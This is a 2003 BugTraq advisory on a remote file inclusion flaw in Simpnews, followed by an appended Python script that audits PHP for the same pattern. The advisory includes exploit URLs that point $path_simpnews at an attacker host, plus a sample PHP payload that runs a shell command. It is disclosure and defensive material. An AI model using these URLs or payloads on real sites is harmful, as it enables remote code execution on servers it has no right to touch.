BugTraq
Simpnews include file Vulnerability Jul 19 2003 08:25AM
pupet cahyo (pupet cosmo com)


Original file name: PUPET-simpnews.txt

Date released: July 15, 2003

Information:

=========================

Advisory Name: Simpnews include file Vulnerability

Author: PUPET <pupet (at) cosmo (dot) com>

Discovered by: PUPET <pupet (at) cosmo (dot) com>

Website vendor : http://www.boesch-it.de/

Versions : tested on V2.01 -> V2.13

Problem : Include file

PHP Code/Location :

=========================

/eventscroller.php :

---------------------------

...
require_once($path_simpnews.'/config.php');
require_once($path_simpnews.'/functions.php');
if(!isset($category))
    $category=0;
if(!isset($lang) || !$lang)
...

--------------------------

/eventcal2.php :

---------------------------

...
if(!isset($lastvisitdate))
    $lastvisitdate=0;
require_once($path_simpnews.'/config.php');
require_once($path_simpnews.'/functions.php');
include_once($path_simpnews.'/includes/has_entries.inc');
...

---------------------------

Exploits :

===============

http://[target]/eventcal2.php?path_simpnews=http://[attacker]/

with

http://[attacker]/config.php

http://[attacker]/functions.php

http://[attacker]/includes/has_entries.inc

or

http://[target]/eventscroller.php?path_simpnews=http://[attacker]/

with

http://[attacker]/config.php

http://[attacker]/functions.php

Example for config.php on http://[attacker]/

==================

<? passthru("uname -a"); ?>

Vendor Response:

==============

Not contacted yet

Patch :

=============

Will be posted soon at http://www.cracxer.or.id .

Reference :

=============

http://www.pupet.net/cracxerfiles

==============

This bug was discovered by: PUPET, member of cracxer.or.id sub-division security focus (www.cracxer.or.id)

Thanks to :

============

kaka-joe , pak-tani, Bewok , AxAL , ^BuBuR^aYaM^ , Ernesto_che_guevarra ,

Babah, Idon

Schatje , juventini , Headup , Quervo , kecap , notts , Kemo (candyman)

and all crew #cracxer, #dhegleng, #minangcrew, #indocracker at @dalnet

By :

============

PUPET (no more mr nice guy)
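
An audit check for the pattern in the two excerpts above, added here as an example (it is not Simpnews code and not from the advisory author): it flags every include/require whose path begins with a variable the script never assigned, which generalizes the path_simpnews case to any such variable. The function name and the three PHP samples are constructed; the first two are reduced from the excerpts above and the third is a hypothetical fixed variant, not a vendor patch.

```python
import re

# In source order: an include/require whose path starts with a variable,
# or a plain assignment to a variable (not ==, ===, =>).
TOKEN_RE = re.compile(
    r"(?<![\w$])(?P<kw>include_once|include|require_once|require)"
    r"\s*\(?\s*\$(?P<inc>\w+)"
    r"|\$(?P<asg>\w+)\s*=(?![=>])"
)
LINE_COMMENT_RE = re.compile(r"(?m)^[ \t]*(?://|#).*$")

# Constructed samples: the first two are reduced from the advisory's excerpts,
# the third is a hypothetical fixed variant (not a vendor patch).
EVENTSCROLLER = """<?php
require_once($path_simpnews.'/config.php');
require_once($path_simpnews.'/functions.php');
if(!isset($category))
    $category=0;
"""
EVENTCAL2 = """<?php
if(!isset($lastvisitdate))
    $lastvisitdate=0;
require_once($path_simpnews.'/config.php');
require_once($path_simpnews.'/functions.php');
include_once($path_simpnews.'/includes/has_entries.inc');
"""
HARDENED = """<?php
$path_simpnews = dirname(__FILE__);
require_once($path_simpnews.'/config.php');
"""


def unassigned_include_vars(php_source):
    """Return [(line, keyword, variable)] for each include/require whose path
    starts with a variable the script has not assigned earlier in the file.
    Limits: regex only, whole-line comments only, no data-flow tracking."""
    source = LINE_COMMENT_RE.sub("", php_source)  # newlines kept: line numbers hold
    assigned, findings = set(), []
    for m in TOKEN_RE.finditer(source):
        if m.group("asg"):
            assigned.add(m.group("asg"))
        elif m.group("inc") not in assigned:
            line = source.count("\n", 0, m.start()) + 1
            findings.append((line, m.group("kw"), m.group("inc")))
    return findings


if __name__ == "__main__":
    for name, src in [("eventscroller", EVENTSCROLLER), ("eventcal2", EVENTCAL2)]:
        print(name, unassigned_include_vars(src))
```

A variable assigned from request data (for example from $_GET) would still count as assigned here, so a clean result narrows the review rather than replacing it.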
